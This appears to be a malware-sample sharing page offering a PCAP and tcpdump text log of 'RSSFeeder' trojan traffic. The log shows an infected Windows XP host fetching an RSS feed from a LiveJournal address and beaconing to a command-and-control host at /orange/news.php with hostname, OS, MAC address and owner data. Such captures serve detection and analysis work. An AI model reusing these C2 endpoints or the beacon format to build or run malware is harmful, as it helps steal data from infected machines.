RSSFeeder RSS Data Password Stealer Malware Trojan Traffic Sample PCAP Download

By | January 29, 2016

Download RSSFeeder PCAP file : rssfeeder.pcap

2013-01-05 22:20:37.052653 IP 172.16.253.240.53 > 8.8.8.8.53: 53824+ A? huming386.livejournal.com. (43)
E..G…….x………5.5.3W..@………. huming386.livejournal.com…..
2013-01-05 22:20:37.052718 IP 172.16.253.240.53 > 4.2.2.2.53: 53824+ A? huming386.livejournal.com. (43)
E..G……………..5.5.3a..@………. huming386.livejournal.com…..
2013-01-05 22:20:37.088158 IP 8.8.8.8.53 > 172.16.253.240.53: 53824 1/0/0 A 208.93.0.128 (59)
E..W……………..5.5.C.v.@………. huming386.livejournal.com………………]..
2013-01-05 22:20:37.089454 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [S], seq 309795285, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0. @…~……]…y.P.w……p….:……….
2013-01-05 22:20:37.090471 IP 4.2.2.2.53 > 172.16.253.240.53: 53824 1/0/0 A 208.93.0.128 (59)
E..W……………..5.5.C…@………. huming386.livejournal.com………………]..
2013-01-05 22:20:37.164606 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [S.], seq 2593427291, ack 309795286, win 64240, options [mss 1460], length 0
E..,…….c.]…….P.y…[.w..`….@……..
2013-01-05 22:20:37.164661 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [.], ack 1, win 64240, length 0
E..(.”@…~……]…y.P.w…..\P…….
2013-01-05 22:20:37.164900 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [P.], seq 1:220, ack 1, win 64240, length 219: HTTP: GET /data/rss HTTP/1.1
E….#@…}……]…y.P.w…..\P…….GET /data/rss HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
Host: huming386.livejournal.com
Connection: Keep-Alive
2013-01-05 22:20:37.165028 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [.], ack 220, win 64240, length 0
E..(…….f.]…….P.y…\.w..P….”……..
2013-01-05 22:20:37.257283 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [P.], seq 1:1122, ack 220, win 64240, length 1121: HTTP: HTTP/1.1 200 OK
E…………]…….P.y…\.w..P…iL..HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

c.,.0.^.4j..J’a..B…5…i.’&…….
2013-01-05 22:20:37.310103 IP 172.16.253.240.53 > 8.8.8.8.53: 20742+ A? killme.98.shoptupian.com. (42)
E..F.&…..p………5.5.2w.Q…………killme.98
shoptupian.com…..
2013-01-05 22:20:37.310202 IP 172.16.253.240.53 > 4.2.2.2.53: 20742+ A? killme.98.shoptupian.com. (42)
E..F.’…..{………5.5.2..Q…………killme.98
shoptupian.com…..
2013-01-05 22:20:37.357728 IP 208.93.0.128.80 > 172.16.253.240.1145: Flags [P.], seq 1:1122, ack 220, win 64240, length 1121: HTTP: HTTP/1.1 200 OK
E…………]…….P.y…\.w..P…iL..HTTP/1.1 200 OK
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:49:06 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Content-Length: 592
Accept-Ranges: bytes
X-Varnish: 1502242906 1495326149
Age: 33018
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

………..TKo.@…WL/…v….7.J………….xw.>……..CAPN.g……….h..j…(.T…5……….d/..N…..A0^)…[..,.[……..R.”…S..]!…..FCz…-1s]..+..-..n!.8..(^t3-..[…..X…..Rze..l..AB.)#.+f..ck……En..[.\..T..5.;-.h.a.o.{Q….q@…+.E..H.p…..t.. a….&1OWR…….j..mfD….”.pF..-%am`…{.E19…….^….#.A….A……n.\….P.&m9.{…6…..v….HL..WQ…..(*..\UbZ..kzi#..N”….^L@..4……3….. ….$^K4Z……a…}…?….d|~q….]_~……7{.&….7..W…..}..b..5.f….o._7..$*g..h.i.h<Sm.t..I5.D3!U).D.G..27{..D….v.b..pUJ…K….
c.,.0.^.4j..J’a..B…5…i.’&…….
2013-01-05 22:20:37.357755 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [.], ack 1122, win 63119, length 0
E..(.(@…~……]…y.P.w……P….”..
2013-01-05 22:20:37.861590 IP 8.8.8.8.53 > 172.16.253.240.53: 20742 1/0/0 A 216.83.45.18 (58)
E..V……………..5.5.B#.Q…………killme.98
shoptupian.com………………S-.
2013-01-05 22:20:37.862206 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [S], seq 3684689920, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.*@…J7…..S-..z.P……..p….]……….
2013-01-05 22:20:38.120232 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [S.], seq 918891572, ack 3684689921, win 64240, options [mss 1460], length 0
E..,………S-……P.z6.,4….`….Y……..
2013-01-05 22:20:38.120285 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 1, win 64240, length 0
E..(.,@…J=…..S-..z.P….6.,5P…….
2013-01-05 22:20:38.120504 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [P.], seq 1:392, ack 1, win 64240, length 391: HTTP: POST /orange/news.php HTTP/1.1
E….-@…H……S-..z.P….6.,5P….k..POST /orange/news.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache

2013-01-05 22:20:38.893525 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [P.], seq 176:219, ack 562, win 64240, length 43: HTTP
E..S………S-……P.z6.,….2P…Ci..<div id=”0a552b5a4352″>{‘command’:[]}</div>
2013-01-05 22:20:38.893551 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 219, win 64022, length 0
E..(.0@…J9…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.894802 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [FP.], seq 219, ack 562, win 64240, length 0
E..(………S-……P.z6.-….2P………….
2013-01-05 22:20:38.894836 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [.], ack 220, win 64022, length 0
E..(.2@…J7…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.895009 IP 172.16.253.240.1146 > 216.83.45.18.80: Flags [F.], seq 562, ack 220, win 64022, length 0
E..(.3@…J6…..S-..z.P…26.-.P…….
2013-01-05 22:20:38.895669 IP 216.83.45.18.80 > 172.16.253.240.1146: Flags [.], ack 563, win 64239, length 0
E..(………S-……P.z6.-….3P….
……..
2013-01-05 22:20:39.029234 IP 172.16.253.240.1145 > 208.93.0.128.80: Flags [R.], seq 220, ack 1122, win 0, length 0
E..(.4@…~……]…y.P.w……P…….
2013-01-05 22:21:36.829017 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [S], seq 403722902, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.5@…~……]…|.P..R…..p……………
2013-01-05 22:21:36.908327 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [S.], seq 1074720888, ack 403722903, win 64240, options [mss 1460], length 0
E..,…….V.]…….P.|@..x..R.`….L……..
2013-01-05 22:21:36.908368 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [.], ack 1, win 64240, length 0
E..(.7@…~……]…|.P..R.@..yP…. ..
2013-01-05 22:21:36.908572 IP 172.16.253.240.1148 > 208.93.0.128.80: Flags [P.], seq 1:313, ack 1, win 64240, length 312: HTTP: GET /data/rss HTTP/1.1
E..`.8@…}……]…|.P..R.@..yP….j..GET /data/rss HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.9.1) Gecko/20090624 Firefox/3.5
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 20 Dec 2012 03:31:19 GMT
If-None-Match: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
Host: huming386.livejournal.com
Connection: Keep-Alive
2013-01-05 22:21:36.908742 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [.], ack 313, win 64240, length 0
E..(…….Y.]…….P.|@..y..S.P………….
2013-01-05 22:21:37.008574 IP 208.93.0.128.80 > 172.16.253.240.1148: Flags [P.], seq 1:519, ack 313, win 64240, length 518: HTTP: HTTP/1.1 304 Not Modified
E……….R.]…….P.|@..y..S.P…….HTTP/1.1 304 Not Modified
Server: GoatProxy 1.0
Date: Sun, 06 Jan 2013 05:50:05 GMT
Content-Type: text/xml; charset=utf-8
Connection: keep-alive
X-AWS-Id: ws30
Cache-Control: private, proxy-revalidate
Content-Encoding: gzip
Content-MD5: yuh3LXs6KS2H9PjPSW1ZUQ
Vary: Accept-Encoding,ETag
Last-Modified: Thu, 20 Dec 2012 03:31:19 GMT
Accept-Ranges: bytes
X-Varnish: 1502254454 1495326149
Age: 33078
X-VWS-Id: bil1-varn23
ETag: GgZzyuh3LXs6KS2H9PjPSW1ZUQ
X-Gateway: bil1-swlb07
X-Beta: http://varnish

2013-01-05 22:21:37.330258 IP 172.16.253.240.1149 > 216.83.45.18.80: Flags [P.], seq 1:392, ack 1, win 64240, length 391: HTTP: POST /orange/news.php HTTP/1.1
E….>@…H……S-..}.P…Oz…P…S;..POST /orange/news.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: killme.98.shoptupian.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
2013-01-05 22:21:37.330400 IP 172.16.253.240.1149 > 216.83.45.18.80: Flags [P.], seq 392:562, ack 1, win 64240, length 170: HTTP
E….?@…I……S-..}.P….z…P….1..cstype=server&authname=servername&authpass=serverpass&hostname=DELLXT&ostype=Microsoft Windows XP Professional3&macaddr=00:0C:29:71:24:89&owner=two13&version=1.2.0&t=4941
2013-01-05 22:21:37.330437 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [.], ack 392, win 64240, length 0
E..(………S-……P.}z…….P…G_……..
2013-01-05 22:21:37.330580 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [.], ack 562, win 64240, length 0
E..(………S-……P.}z…….P…F………
2013-01-05 22:21:38.032142 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [P.], seq 1:176, ack 562, win 64240, length 175: HTTP: HTTP/1.1 200 OK
E…………S-……P.}z…….P…[-..HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Jan 2013 05:48:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Content-type: text/css
2013-01-05 22:21:38.044176 IP 216.83.45.18.80 > 172.16.253.240.1149: Flags [P.], seq 176:219, ack 562, win 64240, length 43: HTTP
E..S………S-……P.}z…….P….8..<div id=”0a552b5a4352″>{‘command’:[]}</div>

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *